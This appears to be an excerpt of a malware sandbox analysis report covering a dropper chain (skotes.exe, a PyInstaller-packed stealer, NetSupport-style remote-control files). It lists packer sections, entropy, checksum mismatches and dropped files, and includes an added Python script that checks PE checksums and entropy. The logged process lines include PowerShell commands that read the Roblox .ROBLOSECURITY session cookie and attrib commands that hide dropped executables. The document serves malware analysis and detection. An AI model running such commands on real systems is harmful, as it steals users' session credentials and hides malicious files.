                                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: D1UL0FG.exe, 00000005.00000003.2466240727.0000027326162000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.3012961847.00007FF8BA24D000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: FuturreApp.exe, 00000055.00000002.7289981712.000000006BFE5000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3011122158.00007FF8B9131000.00000040.00000001.01000000.00000013.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3012153000.00007FF8B93C1000.00000040.00000001.01000000.00000011.sdmp
                                Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewText.pdb source: skotes.exe, 00000003.00000002.7285940039.0000000001390000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000003.5971400666.0000000001402000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000003.00000002.7286155793.0000000001402000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: D1UL0FG.exe, D1UL0FG.exe, 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp
                                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.pdb source: powershell.exe, 00000037.00000002.2645286273.0000021F95B72000.00000004.00000800.00020000.00000000.sdmp

                                Data Obfuscation

                                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.260000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 2.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 3.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 89.2.skotes.exe.690000.0.unpack :EW;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;uyplpdnx:EW;lxepjdzt:EW;.taggant:EW;
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe | Unpacked PE file: 96.2.d188864e84.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uzxdwyvi:EW;efzdldig:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uzxdwyvi:EW;efzdldig:EW;.taggant:EW;
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: random[4].exe1.3.dr | Static PE information: 0x94370F66 [Sun Oct 18 12:19:50 2048 UTC]
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8AA6EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,6_2_00007FF8A8AA6EE0
                                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_4404468
                                Source: fde98a8d0b.exe.3.dr | Static PE information: real checksum: 0x2caf1f should be: 0x2c9c57
                                Source: random[2].exe.3.dr | Static PE information: real checksum: 0x1f4c52 should be: 0x1fe410
                                Source: random[1].exe.3.dr | Static PE information: real checksum: 0x1d2d25 should be: 0x1d6b7c
                                Source: f7b3852b06.exe.3.dr | Static PE information: real checksum: 0x1b6453 should be: 0x1a94f6
                                Source: random[1].exe1.3.dr | Static PE information: real checksum: 0x1ceb69 should be: 0x1dabc0
                                Source: random[2].exe0.3.dr | Static PE information: real checksum: 0x0 should be: 0x6066
                                Source: random[3].exe.3.dr | Static PE information: real checksum: 0x1cccfc should be: 0x1d2879
                                Source: random[4].exe0.3.dr | Static PE information: real checksum: 0x1b6453 should be: 0x1a94f6
                                Source: random[4].exe1.3.dr | Static PE information: real checksum: 0x0 should be: 0x14b59
                                Source: db75e03f4b.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x324fc1
                                Source: random[3].exe0.3.dr | Static PE information: real checksum: 0x2caf1f should be: 0x2c9c57
                                Source: file.exe | Static PE information: real checksum: 0x2efd64 should be: 0x2f41c0
                                Source: 97d4b1071f.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x14b59
                                Source: random[1].exe0.3.dr | Static PE information: real checksum: 0x0 should be: 0x11353a
                                Source: skotes.exe.0.dr | Static PE information: real checksum: 0x2efd64 should be: 0x2f41c0
                                Source: d188864e84.exe.3.dr | Static PE information: real checksum: 0x1d2d25 should be: 0x1d6b7c
                                Source: a4439a2887.exe.3.dr | Static PE information: real checksum: 0x0 should be: 0x11353a
                                Source: cb947ba4b8.exe.3.dr | Static PE information: real checksum: 0x1f4c52 should be: 0x1fe410
                                Source: random[4].exe2.3.dr | Static PE information: real checksum: 0x0 should be: 0x324fc1
                                Source: f8645e1e85.exe.3.dr | Static PE information: real checksum: 0x1cccfc should be: 0x1d2879
                                Source: file.exe | Static PE information: section name:
                                Source: file.exe | Static PE information: section name: .idata
                                Source: file.exe | Static PE information: section name: uyplpdnx
                                Source: file.exe | Static PE information: section name: lxepjdzt
                                Source: file.exe | Static PE information: section name: .taggant
                                Source: skotes.exe.0.dr | Static PE information: section name:
                                Source: skotes.exe.0.dr | Static PE information: section name: .idata
                                Source: skotes.exe.0.dr | Static PE information: section name: uyplpdnx
                                Source: skotes.exe.0.dr | Static PE information: section name: lxepjdzt
                                Source: skotes.exe.0.dr | Static PE information: section name: .taggant
                                Source: random[1].exe.3.dr | Static PE information: section name:
                                Source: random[1].exe.3.dr | Static PE information: section name: .idata
                                Source: random[1].exe.3.dr | Static PE information: section name:
                                Source: random[1].exe.3.dr | Static PE information: section name: uzxdwyvi
                                Source: random[1].exe.3.dr | Static PE information: section name: efzdldig
                                Source: random[1].exe.3.dr | Static PE information: section name: .taggant
                                Source: random[3].exe.3.dr | Static PE information: section name:
                                Source: random[3].exe.3.dr | Static PE information: section name: .idata
                                Source: random[3].exe.3.dr | Static PE information: section name:
                                Source: random[3].exe.3.dr | Static PE information: section name: speiiqif
                                Source: random[3].exe.3.dr | Static PE information: section name: suzusvsz
                                Source: random[3].exe.3.dr | Static PE information: section name: .taggant
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name:
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name: .idata
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name:
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name: speiiqif
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name: suzusvsz
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name: .taggant
                                Source: random[3].exe0.3.dr | Static PE information: section name:
                                Source: random[3].exe0.3.dr | Static PE information: section name: .idata
                                Source: random[3].exe0.3.dr | Static PE information: section name: ygtpparq
                                Source: random[3].exe0.3.dr | Static PE information: section name: zzjdxvxy
                                Source: random[3].exe0.3.dr | Static PE information: section name: .taggant
                                Source: fde98a8d0b.exe.3.dr | Static PE information: section name:
                                Source: fde98a8d0b.exe.3.dr | Static PE information: section name: .idata
                                Source: fde98a8d0b.exe.3.dr | Static PE information: section name: ygtpparq
                                Source: fde98a8d0b.exe.3.dr | Static PE information: section name: zzjdxvxy
                                Source: fde98a8d0b.exe.3.dr | Static PE information: section name: .taggant
                                Source: random[4].exe0.3.dr | Static PE information: section name:
                                Source: random[4].exe0.3.dr | Static PE information: section name: .idata
                                Source: random[4].exe0.3.dr | Static PE information: section name:
                                Source: random[4].exe0.3.dr | Static PE information: section name: efaooxfi
                                Source: random[4].exe0.3.dr | Static PE information: section name: covnxbgl
                                Source: random[4].exe0.3.dr | Static PE information: section name: .taggant
                                Source: d188864e84.exe.3.dr | Static PE information: section name:
                                Source: d188864e84.exe.3.dr | Static PE information: section name: .idata
                                Source: d188864e84.exe.3.dr | Static PE information: section name:
                                Source: d188864e84.exe.3.dr | Static PE information: section name: uzxdwyvi
                                Source: d188864e84.exe.3.dr | Static PE information: section name: efzdldig
                                Source: d188864e84.exe.3.dr | Static PE information: section name: .taggant
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name:
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name: .idata
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name:
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name: efaooxfi
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name: covnxbgl
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name: .taggant
                                Source: random[1].exe1.3.dr | Static PE information: section name:
                                Source: random[1].exe1.3.dr | Static PE information: section name: .idata
                                Source: random[1].exe1.3.dr | Static PE information: section name:
                                Source: random[1].exe1.3.dr | Static PE information: section name: xnuzvlhe
                                Source: random[1].exe1.3.dr | Static PE information: section name: tzuttanx
                                Source: random[1].exe1.3.dr | Static PE information: section name: .taggant
                                Source: random[2].exe.3.dr | Static PE information: section name:
                                Source: random[2].exe.3.dr | Static PE information: section name: .idata
                                Source: random[2].exe.3.dr | Static PE information: section name:
                                Source: random[2].exe.3.dr | Static PE information: section name: fhxxuwls
                                Source: random[2].exe.3.dr | Static PE information: section name: vzpihbtm
                                Source: random[2].exe.3.dr | Static PE information: section name: .taggant
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name:
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name: .idata
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name:
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name: fhxxuwls
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name: vzpihbtm
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name: .taggant
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0027D91C push ecx; ret 0_2_0027D92F
                                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00271359 push es; ret 0_2_0027135A
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 2_2_006AD91C push ecx; ret 2_2_006AD92F
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006E062C push 00000000h; ret 3_2_006E063C
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006E1296 push 00000000h; ret 3_2_006E1298
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006E1716 push 00000000h; ret 3_2_006E1718
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006AD91C push ecx; ret 3_2_006AD92F
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006ADFC6 push ecx; ret 3_2_006ADFD9
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A863A154 push rsp; ret 6_2_00007FF8A863A155
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8639193 push rdi; iretd 6_2_00007FF8A8639195
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A863A2D5 push rsp; retf 6_2_00007FF8A863A2D6
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A86392D4 push r10; retf 6_2_00007FF8A8639340
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8639BF2 push rsp; retf 6_2_00007FF8A8639BF3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636C11 push r10; ret 6_2_00007FF8A8636C13
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636CDA push rdx; ret 6_2_00007FF8A8636CE1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636CE6 push r12; ret 6_2_00007FF8A8636CE8
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636CBC push r8; ret 6_2_00007FF8A8636CC9
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A863A499 push rdx; ret 6_2_00007FF8A863A4F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8639D75 push rsp; iretq 6_2_00007FF8A8639D76
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A863854C push rbp; retf 6_2_00007FF8A8638565
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636DEB push rsp; ret 6_2_00007FF8A8636DF3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8638597 push r12; ret 6_2_00007FF8A86385D3
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8638E56 push rbp; iretq 6_2_00007FF8A8638E57
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636E34 push rdi; iretd 6_2_00007FF8A8636E36
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8638EEE push r12; ret 6_2_00007FF8A8638F15
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636EC0 push r12; ret 6_2_00007FF8A8636EDE
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636EA6 push r10; retf 6_2_00007FF8A8636EA9
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636E8B push rsi; ret 6_2_00007FF8A8636E8C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636E7C push rsp; iretd 6_2_00007FF8A8636E7D
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8638F43 push r12; iretd 6_2_00007FF8A8638F5A
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Code function: 6_2_00007FF8A8636F44 push r8; ret 6_2_00007FF8A8636F4C
                                Source: file.exe | Static PE information: section name: entropy: 7.986412821940457
                                Source: skotes.exe.0.dr | Static PE information: section name: entropy: 7.986412821940457
                                Source: random[1].exe.3.dr | Static PE information: section name: entropy: 7.974324170155358
                                Source: random[1].exe.3.dr | Static PE information: section name: uzxdwyvi entropy: 7.955304664762435
                                Source: random[3].exe.3.dr | Static PE information: section name: entropy: 7.9808008709140585
                                Source: random[3].exe.3.dr | Static PE information: section name: speiiqif entropy: 7.953421574141461
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name: entropy: 7.9808008709140585
                                Source: f8645e1e85.exe.3.dr | Static PE information: section name: speiiqif entropy: 7.953421574141461
                                Source: random[4].exe0.3.dr | Static PE information: section name: entropy: 7.822208608300262
                                Source: random[4].exe0.3.dr | Static PE information: section name: efaooxfi entropy: 7.952428212119931
                                Source: d188864e84.exe.3.dr | Static PE information: section name: entropy: 7.974324170155358
                                Source: d188864e84.exe.3.dr | Static PE information: section name: uzxdwyvi entropy: 7.955304664762435
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name: entropy: 7.822208608300262
                                Source: f7b3852b06.exe.3.dr | Static PE information: section name: efaooxfi entropy: 7.952428212119931
                                Source: random[1].exe0.3.dr | Static PE information: section name: .text entropy: 7.73440914387992
                                Source: a4439a2887.exe.3.dr | Static PE information: section name: .text entropy: 7.73440914387992
                                Source: random[1].exe1.3.dr | Static PE information: section name: entropy: 7.983709808349382
                                Source: random[1].exe1.3.dr | Static PE information: section name: xnuzvlhe entropy: 7.953847578299681
                                Source: random[2].exe.3.dr | Static PE information: section name: entropy: 7.976124615911012
                                Source: random[2].exe.3.dr | Static PE information: section name: fhxxuwls entropy: 7.952193964481426
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name: entropy: 7.976124615911012
                                Source: cb947ba4b8.exe.3.dr | Static PE information: section name: fhxxuwls entropy: 7.952193964481426
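The checksum entries ("real checksum ... should be ...") and the section name / entropy entries above are all derived from static parsing of the PE headers. Reading the report: "real checksum" is the CheckSum field as stored in the optional header and "should be" is the value recomputed from the file (the 0x0 entries make the direction clear; a zero means the linker or packer never filled it in). Windows only enforces this field for kernel drivers and boot-critical images, so a mismatch does not stop a user-mode executable from running; it is evidence that the file was rewritten after linking, which is exactly what a packer that adds an unnamed section, random eight-letter sections and a `.taggant` section does. Entropy close to 8.0 bits per byte in the same sections says their content is compressed or encrypted. The Python below is an added illustration written for this page, not Joe Sandbox's code and not taken from the sample: it recomputes the documented PE CheckSum algorithm, lists section names, flags names outside a small set of linker defaults (`COMMON_SECTIONS` is my own list, not a standard), and measures Shannon entropy. `build_minimal_pe` constructs a synthetic PE in memory so the demonstration runs offline; `check_file` does the same work on a real executable.

```python
"""Added example: recompute a PE CheckSum and score its sections.

Illustrative code written for this report page (not Joe Sandbox's engine).
Standard library only; the demo image is a synthetic PE constructed here,
not the analysed sample.
"""
import math
import struct
from collections import Counter

# Names a stock MSVC/MinGW build emits (my own list, not an official one).
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                   ".rsrc", ".reloc", ".tls", ".bss", ".CRT", ".gfids", ".00cfg"}


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Documented PE CheckSum: 32-bit words summed with end-around carry,
    folded to 16 bits, the CheckSum field skipped, plus the file length."""
    padded = data + b"\x00" * (-len(data) % 4)
    total, skip = 0, checksum_offset // 4
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; values near 8.0 indicate compressed/encrypted data."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def parse_pe(data: bytes) -> dict:
    """Stored vs. recomputed CheckSum plus per-section name and entropy."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    checksum_off = opt + 64                  # same offset for PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections, sect = [], opt + opt_size
    for i in range(nsections):
        hdr = data[sect + 40 * i: sect + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
        body = data[raw_ptr: raw_ptr + raw_size]
        sections.append({"name": name,
                         "entropy": round(shannon_entropy(body), 3),
                         "suspicious_name": name not in COMMON_SECTIONS})
    return {"stored": stored,
            "computed": pe_checksum(data, checksum_off),
            "sections": sections}


def check_file(path: str) -> dict:
    """Run parse_pe over a real executable on disk."""
    with open(path, "rb") as fh:
        return parse_pe(fh.read())


def build_minimal_pe(stored_checksum: int, sections: list) -> bytes:
    """Constructed test image: DOS header, PE32 headers, raw section data."""
    opt_size, e_lfanew, align = 224, 64, 512
    hdr_end = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = (hdr_end + align - 1) // align * align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    struct.pack_into("<I", opt, 64, stored_checksum)  # CheckSum field
    hdrs, bodies, ptr = b"", b"", raw_ptr
    for name, body in sections:
        size = (len(body) + align - 1) // align * align
        hdrs += name.encode().ljust(8, b"\0")
        hdrs += struct.pack("<IIII", len(body), 0x1000, size, ptr)
        hdrs += struct.pack("<IIHHI", 0, 0, 0, 0, 0x60000020)
        bodies += body.ljust(size, b"\0")
        ptr += size
    head = dos + b"PE\0\0" + coff + bytes(opt) + hdrs
    return head.ljust(raw_ptr, b"\0") + bodies


if __name__ == "__main__":
    demo = build_minimal_pe(0, [(".text", bytes(range(256)) * 4),
                                ("uyplpdnx", b"A" * 512)])
    print(parse_pe(demo))
```

The stored field is excluded from the sum, so the recomputed value is the same whatever the header says; that is what lets a report state a single "should be" value per file and is why identical mismatches above (for example `random[4].exe0.3.dr` and `f7b3852b06.exe.3.dr`) identify the same dropped binary under two names.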

                                Persistence and Installation Behavior

                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                                Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
                                Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                                Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: attrib.exe
                                Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe | Process created: attrib.exe
                                Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
                                Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                                Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | File created: C:\Users\Public\Netstat\TCCTL32.DLL
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\sqlite3.dll
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017921001\85070a414c.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\select.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\m9sfEU9[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017920001\194df6b68b.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | File created: C:\Users\Public\Netstat\msvcr100.dll
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_lzma.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[3].exe
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe | File created: C:\Users\Public\Netstat\remcmdstub.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_ssl.pyd
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\_sqlite3.pyd
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI51602\VCRUNTIME140.dll
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[4].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\D1UL0FG[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[4].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[4].exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exe
